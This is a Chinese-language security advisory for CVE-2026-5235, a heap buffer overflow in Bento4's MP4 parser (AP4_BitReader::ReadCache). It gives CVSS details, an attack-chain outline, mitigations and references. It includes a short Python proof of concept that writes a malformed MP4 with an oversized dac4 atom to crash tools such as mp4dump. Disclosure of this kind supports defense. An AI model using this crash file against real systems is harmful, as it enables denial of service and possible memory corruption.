CVE-2026-5235: Bento4堆缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-5235

漏洞类型

堆缓冲区溢出

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Axiomatic Bento4

漏洞概述

Axiomatic Bento4 1.6.0-641及更早版本中存在一个安全漏洞。该漏洞位于MP4文件解析组件的Ap4Dac4Atom.cpp文件中，具体涉及AP4_BitReader::ReadCache函数。由于代码对输入数据的边界检查不足，当解析特制的MP4文件时，会引发基于堆的缓冲区溢出。攻击者需要具备本地访问权限和低权限级别即可发起攻击。成功利用该漏洞可能导致机密性、完整性或可用性受到低程度影响。目前漏洞细节已公开，但厂商尚未发布修复补丁。

技术细节

该漏洞的技术根源在于Bento4库中`Ap4Dac4Atom.cpp`文件的`AP4_BitReader::ReadCache`函数实现逻辑存在缺陷。在解析MP4文件格式时，该函数负责从比特流中读取数据并缓存到堆内存中。由于缺乏对输入数据长度的严格验证，当处理攻击者精心构造的恶意MP4文件时，特定字段的数据量可能超过预分配的堆缓冲区大小，导致发生堆缓冲区溢出。攻击向量为本地（AV:L），意味着攻击者必须能够在目标系统上执行代码（通常通过低权限账户）。尽管CVSS评分仅为5.3（中危），但堆溢出在某些内存布局下可能导致更严重的后果，如任意代码执行或应用程序崩溃（拒绝服务）。由于厂商未响应，用户目前处于风险之中。

攻击链分析

STEP 1

侦察与访问

攻击者获取目标系统的本地访问权限，通常通过低权限账户。

STEP 2

武器化

攻击者分析Bento4源码，构造特制的MP4文件，该文件包含针对AP4_BitReader::ReadCache函数的恶意数据。

STEP 3

传递

将恶意MP4文件传输到目标系统，或诱导本地用户/应用程序使用Bento4库处理该文件。

STEP 4

利用

目标系统上的Bento4解析工具（如mp4dump、mp4extract等）解析该文件时，触发ReadCache函数的堆缓冲区溢出。

STEP 5

影响

导致解析程序崩溃（拒绝服务），或在特定条件下实现任意代码执行，造成数据泄露或篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-5235
# This script generates a malformed MP4 file to trigger the heap overflow.

import struct

def create_poc_mp4(filename):
    # Minimal MP4 box header structure
    # The actual exploit requires specific data patterns in the DAC4 atom
    # to trigger the overflow in AP4_BitReader::ReadCache.
    
    # File header (ftyp placeholder)
    ftyp = b'\x00\x00\x00\x20ftypisom\x00\x00\x02\x00isomiso2avc1mp41\x00\x00\x00\x00'
    
    # Malicious DAC4 atom structure
    # Size field (large size to potentially confuse parser)
    # Type 'dac4'
    atom_header = struct.pack('>I', 0xFFFFFFFF) + b'dac4'
    
    # Payload designed to overflow the ReadCache buffer
    # Sending excessive bytes to trigger the heap corruption
    malicious_payload = b'A' * 0x5000 
    
    with open(filename, 'wb') as f:
        f.write(ftyp)
        f.write(atom_header)
        f.write(malicious_payload)

if __name__ == "__main__":
    print("Generating PoC file for CVE-2026-5235...")
    create_poc_mp4("cve_2026_5235_poc.mp4")
    print("[+] PoC file generated: cve_2026_5235_poc.mp4")
    print("[+] Use Bento4 tools (e.g., mp4dump) to parse this file to trigger the crash.")

影响范围

Axiomatic Bento4 <= 1.6.0-641

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议采取以下临时缓解措施：严格限制系统用户对Bento4相关工具的执行权限；仅处理可信来源的MP4媒体文件；在应用程序层面增加对输入文件的预校验逻辑（如文件大小和格式限制），以降低触发漏洞的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5235
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5235
3 Details https://www.cvedetails.com/cve/CVE-2026-5235/
4 VulDB https://vuldb.com/cve/CVE-2026-5235
5 Link https://github.com/axiomatic-systems/Bento4/issues/1058
6 Link https://github.com/axiomatic-systems/Bento4/issues/1058#issue-4078583078
7 Link https://vuldb.com/submit/780472
8 Link https://vuldb.com/vuln/354386
9 Link https://vuldb.com/vuln/354386/cti